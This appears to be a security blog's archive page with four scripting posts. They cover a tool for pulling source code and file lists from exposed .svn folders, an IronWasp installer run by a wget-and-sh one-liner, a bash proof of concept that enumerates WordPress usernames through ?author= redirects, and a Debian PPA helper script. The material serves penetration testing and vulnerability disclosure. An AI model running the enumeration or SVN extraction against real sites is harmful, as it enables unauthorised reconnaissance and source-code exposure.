Category Archives: scripting

SVN Extractor for Web Pentesters

Many a times web application pen-testers are encountered with the presence of .svn folders. For those not aware .svn folder is used by SVN version control system to perform its operations. For a blackbox pentester this folder contains huge amount of information.

1) Uncover hidden files and folder names

2) Access the source code of the files.

3) download files even if the restrictions are in place at htaccess.

How this could be achieved.

1) Uncover hidden files and folder names

There are two ways in which this can be achieved based on the version of SVN in use.

for <1.6 we had .svn/entries files which contained list of files / folders as well as usernames used for commiting those files.

for >1.6 we have .svn/wc.db which contains simmilar data but in a sqlite3 format.

Those files could be directly accessible through url.

2) Access the source code / download files even if htaccess blocks its access.

SVN keeps a backup copy of all files in two seperate locations.

1) .svn/text-base/“filename”.svn-base

2) .svn/pristine/“XX”/“CHECKSUM”.svn-base

where

filename is actual name of file.

CHECKSUM is Sha1 sum of the file

XX is first two character of CHECKSUM.

first type of entries has one limitations suppose file name is testme.php so path becomes.

.svn/text-base/testme.php.svn-base

a large number of servers will execute the file using php engine and serve the output.

that’s where option 2 shines however this information is available only in case of wc.db (>1.6 SVN version) and this requires that .sv/pristine directory should be web accessible.

However after searching a lot i was not able to find a single code which can do both these things in one go.

so here is a tool which can perform both the operations in one script.

Usage

svn-extractor.py –url “url with .svn available”

Source Link : https://github.com/anantshri/svn-extractor

So far only tested on localhost environments however hoping to get some response on the same.

References

It would be unfair to say that i did all the research myself so here are the links to various resources i used to get the info out.

1) http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us (manual technique for wc.db)

2) http://www.adamgotterer.com/post/28125474053/hacking-the-svn-directory-archive (manual technique for .svn/entries)

3) http://www.cirt.net/svnpristine (only automated tool i can find online doing 1/2 of what is in the tool)

IronWasp on Linux

Those looking for how to download and install IRONWASP on linux.

One Line copy paste code.

wget http://blog.anantshri.info/content/uploads/2013/01/ironwasp_installer.sh.txt -O ~/ironwasp_installer.sh && sh ~/ironwasp_installer.sh

Those looking for some read can continue from here.

This post will talk about running IronWasp on Linux. So a little background.

IRONWASP : (from ironwasp.org)

IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.

Where does Linux comes into picture?

IronWASP is based on fiddlercore and uses .net for UI Designing. Hence running on linux was a bit hard. Mono is out of question here as fiddler core doesn’t play well with mono. Me and Lava did worked on checking if mono can support but the efforts didn’t work out. Then Came the crossoveroffice Give away Sale and a surprise tweet from R3dsm0k3 about being able to run ironwasp successfully through crossover office on MAC

ironwasp

From that time i was wondering why only crossover office we should be able to do it directly in wine. Finally today i got some time to sit and see how crossover do it and what could be done with Wine. and here is the output.

Disclaimer : this is in no ways a fully baked script, its bits and pieces joined overnight to get things working. I can’t promise that a new release will be done but would surely help anyone who wants to work on it.

Once you run this script all you need to do is click on next next finish for .net 20 installations and soon you will find an icon on your Linux desktop named IWASP which will launch Ironwasp for you. in the Background script will be automatically downloading and installing various dependencies required and configuring the system

Prerequsites : wine version >= 1.4 and internet connectivity.

Will try to see if i can make a video for the same setup till them this texual output should be enough.

Note: During setup if there is a prompt to restart now or later please select restart now. your system won’t reboot just wine restarts.

Download Link : ironwasp_installer.sh

One Liner

wget http://blog.anantshri.info/content/uploads/2013/01/ironwasp_installer.sh.txt -O ~/ironwasp_installer.sh && sh ~/ironwasp_installer.sh

 

Feel free to suggest changes or comment.

KNOWN ISSUES

1) UI-Designer doesn’t work for drag and drop UI building, for 32 bit Linux(working on 64 bit linux). (Mac working is confirmed by r3dsm0k3)

CHANGELOG

22-01-2013 :
1) r3dsm0k3 confirmed that script works on Mac too.
2) Code added modified to add reference.
3) Shortcut details updated to correct few issues when the api tree was not visible on right side.
4) dos2unix converted web edit’s caused script to go dos.
5) wineprefix specifically marked as 32bit.

23-01-2013:

1) Customization to make script work on 64bit linux instances.

NOTE

In case you observe that after running the script here is an error from wine suggesting to install mono for linux / windows i would suggest rerunning the script but this time comment out the wget url for cnet and uncomment the wget url for microsoft downloads. both url are used to download .net sp2 but someone one goes down and i had better sucess ratio with cnet link. However YMMV. Feel free to add a comment here in case of any issue but make sure to include the entire output of the about listed command. This helps in quickly solving the issue.

In case you don’t want to add a lot of junk in comment i would suggest email me with the details at [email protected]

WordPress User Enumeration PoC Shell Script

Hi All,

We have recently seen WordPress User name enumeration Vulnerability disclosure here http://seclists.org/fulldisclosure/2011/May/493

Versions Effected are : 2.6, 3.1, 3.1.1, 3.1.3

Here i am enclosing a simple PoC which could be run on Bash Shell.
(Note : PoC on python is already available for those who are curious)

#!/bin/bash
# WordPress User Enumeration PoC by Anant Shrivastava
# Disclosure : http://seclists.org/fulldisclosure/2011/May/493
# License : GPLv2
# License URL : http://www.gnu.org/licenses/gpl-2.0.html
if [ $# -ne 1 ]
then
	echo "Wordpress username enumeration PoC"
	echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 "
	echo $0 "URL of Website"
else
	count=0
	title=0
	while [ $count -lt 10 ]
	do 
		result=`curl -I -s --max-time 30 --max-filesize 1 $1?author=$count | grep -F 'Location:'`
		name=`echo $result |  rev | cut -f2 -d"/" | rev`
		nm=`echo "$"$result`
		if [ "$nm" != "$" ]
		then
			if [ $title == 0 ]
			then
				echo "ID : UserName"
				title=1
			fi 
			echo -n $count " : "
			echo $name
		fi
		count=`expr $count + 1`
	done
	if [ $title == 0 ]
	then
		echo "Either this site is not vulnerable or is not using wordpress hosted"
	fi
fi

Code could be download from here : wp_2_PoC_user_name_enum

Howto add PPA in debian

I am back with some more scripting fun.

I have been working on configuring my new debian machine and found one utility very lacking in debian and that was add-apt-repository.
So i set down and took my time out and finally i am able to mix match this simple script.

Disclaimer: I know adding ppa can have adverse effects on debian machines

At this point the work that this script performs is

  1. add the repository of the ppa. (here i am using lucid as the distribution of choice, coz i am using squeeze as my debian version)
  2. add the gpg key to the keyring.

Disclaimer

  • This script is at this pointed tested only on one machine. debian Squeeze (mint Flavoured.)

File : add-apt-repository.sh

Steps to install this.

  1. Download file

$ wget http://blog.anantshri.info/content/uploads/2010/09/add-apt-repository.sh.txt

2.  Save this file in /usr/sbin/

$ cp add-apt-repository.sh.txt /usr/sbin/add-apt-repository

3.  Change permissions to execute

$ chmod o+x /usr/sbin/add-apt-repository

4.  Change ownership to root

$chown root:root /usr/sbin/add-apt-repository

5.  Now when ever you need to execute command type

$ sudo add-apt-repository ppa:ppa-name

Opening this script to larger audience so that we can crowdsource efforts if someone likes it.

hope this can help someone

File : add-apt-repository.sh

Change Log

7 – Jan – 2011 : Updated the tutorial to place the file @ /usr/sbin as suggested at various during comments.

6 – Aug – 2011 : Updated the script to deal with the security hole (although not easily exploitable) as suggested by 7eggert at comment no 23

10 Sep – 2011 : bin corrected to sbin in step 3 and 4..  : thanks to Craig for pointing that out